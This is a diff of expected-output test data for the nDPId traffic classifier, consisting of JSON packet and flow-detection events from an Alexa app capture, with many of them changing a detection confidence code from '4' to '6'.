00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} @@ -495,8 +495,8 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} @@ -507,50 +507,50 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 